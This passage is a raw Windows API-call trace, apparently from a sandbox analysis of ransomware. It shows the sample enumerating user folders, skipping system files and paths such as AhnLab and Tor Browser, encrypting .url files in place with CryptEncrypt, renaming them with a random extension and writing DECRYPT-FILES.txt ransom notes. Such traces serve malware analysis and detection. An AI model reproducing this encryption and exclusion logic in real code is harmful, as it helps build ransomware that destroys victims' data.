lstrcmpiW (lpString1="url", lpString2="exe") returned 1 [0085.199] lstrcmpiW (lpString1="url", lpString2="sys") returned 1 [0085.199] lstrcmpiW (lpString1="url", lpString2="dll") returned 1 [0085.200] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned 53 [0085.200] lstrlenW (lpString="Windows Live Mail.url") returned 21 [0085.200] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0085.200] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpString2="Windows Live Mail.url" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" [0085.200] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.200] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0085.200] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=133) returned 1 [0085.200] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0085.200] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0085.200] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0085.200] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0085.200] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.202] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0085.202] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0085.203] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.203] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0085.205] CloseHandle (hObject=0x42c) returned 1 [0085.205] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.205] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0085.206] CloseHandle (hObject=0x0) returned 0 [0085.206] CloseHandle (hObject=0x428) returned 1 [0085.206] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.206] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.206] GetTickCount () returned 0x114dc2c [0085.206] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.207] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0085.207] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0085.207] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.207] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.207] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url") returned 74 [0085.207] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.yxQcBrQ") returned 82 [0085.207] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Mail.url.yxQcBrQ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live mail.url.yxqcbrq"), dwFlags=0x0) returned 1 [0085.208] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.208] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.208] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.209] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 1 [0085.209] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="DECRYPT-FILES.txt") returned 1 [0085.209] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="autorun.inf") returned 1 [0085.209] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="boot.ini") returned 1 [0085.209] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="desktop.ini") returned 1 [0085.209] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="ntuser.dat") returned 1 [0085.209] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="iconcache.db") returned 1 [0085.209] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="bootsect.bak") returned 1 [0085.209] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="ntuser.dat.log") returned 1 [0085.209] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="thumbs.db") returned 1 [0085.209] lstrcmpiW (lpString1="Windows Live Spaces.url", lpString2="Bootfont.bin") returned 1 [0085.209] lstrlenW (lpString="Windows Live Spaces.url") returned 23 [0085.209] lstrcmpiW (lpString1="url", lpString2="lnk") returned 1 [0085.209] lstrcmpiW (lpString1="url", lpString2="exe") returned 1 [0085.209] lstrcmpiW (lpString1="url", lpString2="sys") returned 1 [0085.209] lstrcmpiW (lpString1="url", lpString2="dll") returned 1 [0085.209] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned 53 [0085.209] lstrlenW (lpString="Windows Live Spaces.url") returned 23 [0085.209] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\" [0085.209] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\", lpString2="Windows Live Spaces.url" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" [0085.209] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.210] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0085.210] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=133) returned 1 [0085.210] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0085.210] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0085.211] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0085.211] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0085.211] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.212] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0085.212] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0085.213] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.213] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0085.213] CloseHandle (hObject=0x42c) returned 1 [0085.213] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.214] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0085.214] CloseHandle (hObject=0x0) returned 0 [0085.214] CloseHandle (hObject=0x428) returned 1 [0085.214] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.215] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.215] GetTickCount () returned 0x114dc2c [0085.215] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.215] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0085.215] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0085.216] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.216] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.216] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url") returned 76 [0085.216] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.yxQcBrQ") returned 84 [0085.216] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Windows Live\\Windows Live Spaces.url.yxQcBrQ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\windows live\\windows live spaces.url.yxqcbrq"), dwFlags=0x0) returned 1 [0085.217] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.217] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.217] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.218] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d8930c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Live Spaces.url", cAlternateFileName="WINDOW~3.URL")) returned 0 [0085.218] FindClose (in: hFindFile=0x5f8c98 | out: hFindFile=0x5f8c98) returned 1 [0085.218] CloseHandle (hObject=0x410) returned 1 [0085.218] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xfe5472dd, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Live\\", cAlternateFileName="WINDOW~1")) returned 0 [0085.218] FindClose (in: hFindFile=0x5f8b98 | out: hFindFile=0x5f8b98) returned 1 [0085.218] CloseHandle (hObject=0x430) returned 1 [0085.218] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9d5a6e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa9d5a6e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9d5a6e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0085.218] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0085.218] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0085.218] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0085.218] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0085.218] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0085.218] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0085.218] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0085.218] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0085.218] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0085.218] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0085.218] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0085.218] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0085.218] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0085.218] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0085.218] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0085.218] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned 30 [0085.218] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0085.218] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0085.219] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\jkbimi8.tmp" [0085.219] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.219] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0085.219] CloseHandle (hObject=0x0) returned 0 [0085.219] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.219] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0085.219] lstrcmpW (lpString1="Links", lpString2=".") returned 1 [0085.219] lstrcmpW (lpString1="Links", lpString2="..") returned 1 [0085.219] lstrcatW (in: lpString1="Links", lpString2="\\" | out: lpString1="Links\\") returned="Links\\" [0085.219] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Links\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\" [0085.219] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="\\Program Files") returned 0x0 [0085.219] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch=":\\Windows") returned 0x0 [0085.220] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="\\Games\\") returned 0x0 [0085.220] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="\\Tor Browser\\") returned 0x0 [0085.220] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="\\ProgramData\\") returned 0x0 [0085.220] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0085.220] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0085.220] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0085.220] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="\\All Users") returned 0x0 [0085.220] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="\\IETldCache\\") returned 0x0 [0085.220] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="\\Local Settings\\") returned 0x0 [0085.220] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="\\AppData\\Local") returned 0x0 [0085.220] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="AhnLab") returned 0x0 [0085.220] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0085.220] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned 36 [0085.220] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0085.220] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\\\jkbimi8.tmp") returned 48 [0085.220] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x430 [0085.220] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned 36 [0085.220] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0085.220] wsprintfW (in: param_1=0x3f2e930, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\\\DECRYPT-FILES.txt") returned 54 [0085.220] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0085.221] WriteFile (in: hFile=0x434, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e92c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e92c*=0x23fc, lpOverlapped=0x0) returned 1 [0085.222] CloseHandle (hObject=0x434) returned 1 [0085.222] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\") returned 36 [0085.222] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*" [0085.222] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*", lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaefec200, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaefec200, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8b98 [0085.222] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.222] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaefec200, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaefec200, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.222] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.222] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.222] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaefec200, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaefec200, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaefec200, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0085.222] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0085.222] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x244, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0085.222] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0085.222] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0085.222] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0085.222] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0085.222] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0085.222] lstrcmpiW (lpString1="Desktop.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0085.222] lstrcmpiW (lpString1="Desktop.lnk", lpString2="autorun.inf") returned 1 [0085.222] lstrcmpiW (lpString1="Desktop.lnk", lpString2="boot.ini") returned 1 [0085.222] lstrcmpiW (lpString1="Desktop.lnk", lpString2="desktop.ini") returned 1 [0085.222] lstrcmpiW (lpString1="Desktop.lnk", lpString2="ntuser.dat") returned -1 [0085.222] lstrcmpiW (lpString1="Desktop.lnk", lpString2="iconcache.db") returned -1 [0085.222] lstrcmpiW (lpString1="Desktop.lnk", lpString2="bootsect.bak") returned 1 [0085.222] lstrcmpiW (lpString1="Desktop.lnk", lpString2="ntuser.dat.log") returned -1 [0085.223] lstrcmpiW (lpString1="Desktop.lnk", lpString2="thumbs.db") returned -1 [0085.223] lstrcmpiW (lpString1="Desktop.lnk", lpString2="Bootfont.bin") returned 1 [0085.223] lstrlenW (lpString="Desktop.lnk") returned 11 [0085.223] lstrcmpiW 